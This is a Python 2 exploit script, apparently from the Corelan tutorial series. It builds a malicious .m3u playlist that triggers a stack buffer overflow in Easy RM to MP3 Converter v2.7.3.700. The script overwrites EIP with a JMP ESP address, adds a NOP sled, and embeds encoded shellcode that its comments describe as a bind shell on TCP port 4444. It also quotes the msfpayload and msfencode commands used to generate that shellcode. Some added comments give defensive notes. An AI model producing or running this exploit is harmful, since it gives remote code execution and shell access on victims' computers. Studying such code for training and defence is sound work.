- #!/usr/bin/python
- # Python 2 script (print statements, str used as a byte buffer): it assembles a
- # fixed byte pattern and writes it to a local .m3u file; nothing is sent over the
- # network by this script itself.
- # need the struct-libs for little-endian packing
- import struct
- # some fancy ascii-stuff (as advised in corelans tutorial ;P)
- print """ ______ ____
- / /__ ___ ____ / /___
- __ ____/ // / _\______\_ \ / // /_
- __\ \\ .____// \_____ / \/ // //
- o/ 0\____ \/ \ / \__ /\ /0 /o
- _//__//_______/____Y_____\ / /___/\ \\__\\_
- <<<-Holy.Church.of.0xF00000000/___/--S3M73X\__\\2006-->>>"""
- print "\n -= Win32-Buffer-Overflow-Exploit for 'Easy RM to MP3 Converter v2.7.3.700' =-"
- print "\n corelan tutorial part1 - smtx.2010"
- print " greets 2 back-track-community and CORELAN"
- # building the buffer 26059 bytes till eip (depends on the path where the m3u is stored)
- # Python 2 integer division: (25000 + 1056)/4 == 6514, so len(preeip) == 3 + 4*6514 == 26059.
- preeip = 'PWN' + '5M7X' * ((25000 + 1056)/4) # pre buffer to reach saved EIP
- # overwrite saved EIP with a JMP-ESP
- # Address=01D0F23A
- # Message=Found JMP ESP at 0x1D0F23A (C:\Programme\Easy RM to MP3 Converter\MSRMCcodec02.dll)
- # '<i' = 4-byte little-endian signed int; the address is a module-specific value
- # quoted from the author's debugger output, not something this file verifies.
- eip = struct.pack('<i', 0x1D0F23A) # eip
- # this is to stuff another 4 bytes because of the "calling"-conventions mentioned
- # here -> http://www.corelan.be:8800/index.php/forum/writing-exploits/question-about-esp-in-tutorial-pt1
- # and there -> http://en.wikipedia.org/wiki/X86_calling_conventions
- # there are 4 bytes between ESP and our shellcode so we need this to make
- # ESP pointing onto your shellcode
- pad = 'FUCK'
- # i make a little nopsled just to be sure of "weird" stuff to happen
- nopsled = '\x90' * 10
- # BADCHARS: \x09 = TAB, \x0a = LINEFEED, \x00 = STRING-TERMINATOR
- # size for shellcode is 3937 (not tested) at least enough for what we want
- # testing calc: ./msfpayload windows/exec CMD=calc.exe R | ./msfencode -e x86/shikata_ga_nai -t c -b '\x00\x09\x0a'
- # this is a bind-shell-code listening on TCP-Port:4444
- # ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -t c -b '\x00\x09\x0a'
- # NOTE(review): shcode is an opaque, encoded 369-byte blob pasted from the tool
- # output cited above; its actual behaviour cannot be confirmed from this file.
- # Treat it as untrusted machine code (do not execute it to "check" it; inspect
- # in a disassembler / sandbox only).
- shcode = (
- "\xda\xc4\xd9\x74\x24\xf4\xbf\x99\xd0\x0e\xf5\x5e\x29\xc9\xb1"
- "\x56\x31\x7e\x19\x03\x7e\x19\x83\xee\xfc\x7b\x25\xf2\x1d\xf2"
- "\xc6\x0b\xde\x64\x4e\xee\xef\xb6\x34\x7a\x5d\x06\x3e\x2e\x6e"
- "\xed\x12\xdb\xe5\x83\xba\xec\x4e\x29\x9d\xc3\x4f\x9c\x21\x8f"
- "\x8c\xbf\xdd\xd2\xc0\x1f\xdf\x1c\x15\x5e\x18\x40\xd6\x32\xf1"
- "\x0e\x45\xa2\x76\x52\x56\xc3\x58\xd8\xe6\xbb\xdd\x1f\x92\x71"
- "\xdf\x4f\x0b\x0e\x97\x77\x27\x48\x08\x89\xe4\x8b\x74\xc0\x81"
- "\x7f\x0e\xd3\x43\x4e\xef\xe5\xab\x1c\xce\xc9\x21\x5d\x16\xed"
- "\xd9\x28\x6c\x0d\x67\x2a\xb7\x6f\xb3\xbf\x2a\xd7\x30\x67\x8f"
- "\xe9\x95\xf1\x44\xe5\x52\x76\x02\xea\x65\x5b\x38\x16\xed\x5a"
- "\xef\x9e\xb5\x78\x2b\xfa\x6e\xe1\x6a\xa6\xc1\x1e\x6c\x0e\xbd"
- "\xba\xe6\xbd\xaa\xbc\xa4\xa9\x1f\xf2\x56\x2a\x08\x85\x25\x18"
- "\x97\x3d\xa2\x10\x50\x9b\x35\x56\x4b\x5b\xa9\xa9\x74\x9b\xe3"
- "\x6d\x20\xcb\x9b\x44\x49\x80\x5b\x68\x9c\x06\x0c\xc6\x4f\xe6"
- "\xfc\xa6\x3f\x8e\x16\x29\x1f\xae\x18\xe3\x16\xe9\xd6\xd7\x7a"
- "\x9d\x1a\xe8\x6d\x01\x92\x0e\xe7\xa9\xf2\x99\x90\x0b\x21\x12"
- "\x06\x74\x03\x0e\x9f\xe2\x1b\x58\x27\x0d\x9c\x4e\x0b\xa2\x34"
- "\x19\xd8\xa8\x80\x38\xdf\xe5\xa0\x33\xe7\x6d\x3a\x2a\xa5\x0c"
- "\x3b\x67\x5d\xad\xae\xec\x9e\xb8\xd2\xba\xc9\xed\x25\xb3\x9c"
- "\x03\x1f\x6d\x83\xde\xf9\x56\x07\x04\x3a\x58\x89\xc9\x06\x7e"
- "\x99\x17\x86\x3a\xcd\xc7\xd1\x94\xbb\xa1\x8b\x56\x12\x7b\x67"
- "\x31\xf2\xfa\x4b\x82\x84\x03\x86\x74\x68\xb5\x7f\xc1\x96\x79"
- "\xe8\xc5\xef\x64\x88\x2a\x3a\x2d\xb8\x60\x67\x07\x51\x2d\xfd"
- "\x1a\x3c\xce\x2b\x58\x39\x4d\xde\x20\xbe\x4d\xab\x25\xfa\xc9"
- "\x47\x57\x93\xbf\x67\xc4\x94\x95\x62"
- )
- # filler so that pad + nopsled + shcode + trigger is exactly 3937 bytes
- trigger = '\x90' * ( 3937 - len(shcode) - len(nopsled) - len(pad) )
- # lets put the attack-buffer together
- # total = 26059 + 4 + 3937 = 30000 bytes. Note: `buffer` shadows the Python 2
- # builtin of the same name (harmless in a flat script, but a lint smell).
- buffer = (preeip + eip + pad + nopsled + shcode + trigger)
- # open and write evil buffer into m3u-playlist
- print "\n - writing " + str(len(buffer)) + " bytes into m3u-playlist"
- # the file is written in the current working directory; no `with` block, so the
- # handle is closed explicitly below. For defenders: an .m3u of ~30 KB that is
- # mostly a repeating 4-byte pattern / 0x90 filler is the artefact to look for.
- f = open('pwn_easyRM.m3u', 'w')
- f.write(buffer)
- f.close()
- print " [x] done\n"
- # eof